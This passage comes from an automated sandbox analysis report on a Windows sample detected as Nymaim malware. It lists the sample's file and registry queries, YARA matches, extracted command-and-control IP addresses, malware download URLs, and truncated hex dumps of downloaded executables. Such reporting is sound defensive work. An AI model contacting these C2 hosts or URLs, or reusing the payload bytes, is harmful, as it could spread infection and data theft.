Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: Amcache.hve.30.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.30.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.30.dr	Binary or memory string: procexp.exe

Stealing of Sensitive Information

Yara detected Nymaim

Source: Yara match	File source: 0.3.file.exe.2210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.28.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.32.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.32.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.30.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.30.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.2210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.292406498.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.307333691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.285914510.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265875582.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.254096635.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.293499241.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.299464336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.260403586.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.270306154.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.271549614.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.261149123.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265067890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.280355467.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.300281036.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.254941692.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.306082555.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.253262177.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
148.251.234.83	iplogger.org	Germany	24940	HETZNER-ASDE	false
208.67.104.97	unknown	United States	20042	GRAYSON-COLLIN-COMMUNICATIONSUS	true
85.31.46.167	unknown	Germany	43659	CLOUDCOMPUTINGDE	true
107.182.129.235	unknown	Reserved	11070	META-ASUS	false
171.22.30.106	unknown	Germany	33657	CMCSUS	false

Contacted Domains

Name	IP	Active
iplogger.org	148.251.234.83	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte	true	URL Reputation: malware	unknown
http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte	true	URL Reputation: malware	unknown
http://107.182.129.235/storage/ping.php	false	URL Reputation: safe	unknown
http://107.182.129.235/storage/extension.php	false	URL Reputation: safe	unknown
http://85.31.46.167/software.php	true	URL Reputation: safe	unknown
https://iplogger.org/1Pz8p7	false		high
http://171.22.30.106/library.php	true	URL Reputation: malware	unknown

AV Detection

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 47%

Antivirus detection for URL or domain

Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte	URL Reputation: Label: malware
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte	URL Reputation: Label: malware
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst	URL Reputation: Label: malware
Source: http://171.22.30.106/library.php	URL Reputation: Label: malware

Multi AV Scanner detection for domain / URL

Source: http://85.31.46.167/software.phpZ

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\soft[1]

ReversingLabs: Detection: 28%

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Nymaim {"C2 addresses": ["208.67.104.97", "85.31.46.167"]}

Uses 32bit PE files

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49723 version: TLS 1.2

Source:	Binary string: [C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdbPXC-@ source: file.exe
Source:	Binary string: C:\zakalajoviziw83\mali-xaduvovije95\bahowe\51\xayiziket\fov.pdb source: file.exe

Networking

May check the online IP address of the machine

Source: C:\Users\user\AppData\Local\Temp\aQULKwbFPdioo894n025t\Cleaner.exe

DNS query: name: iplogger.org

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 208.67.104.97
Source: Malware configuration extractor	IPs: 85.31.46.167

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GRAYSON-COLLIN-COMMUNICATIONSUS GRAYSON-COLLIN-COMMUNICATIONSUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 148.251.234.83 148.251.234.83
Source: Joe Sandbox View	IP Address: 148.251.234.83 148.251.234.83

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:32:32 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="dll";Content-Transfer-Encoding: binaryContent-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:32:33 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="soft";Content-Transfer-Encoding: binaryContent-Length: 3947920Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f1 9a e4 ea 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 e4 14 00 00 0c 00 00 00 00 00 00 a6 02 15 00 00 20 00 00 00 20 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 02 15 00 4f 00 00 00 00 20 15 00 32 09 00 00 00 00 00 00 00 00 00 00 00 28 3c 00 90 15 00 00 00 40 15 00 0c 00 00 00 38 02 15 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac e2 14 00 00 20 00 00 00 e4 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 32 09 00 00 00 20 15 00 00 0a 00 00 00 e6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 15 00 00 02 00 00 00 f0 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 88 02 15 00 00 00 00 00 48 00 00 00 02 00 05 00 68 81 00 00 40 45 00 00 01 00 00 00 54 00 00 06 a8 c6 00 00 90 3b 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown	TCP traffic detected without corresponding DNS query: 208.67.104.97
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
Source: unknown	TCP traffic detected without corresponding DNS query: 85.31.46.167
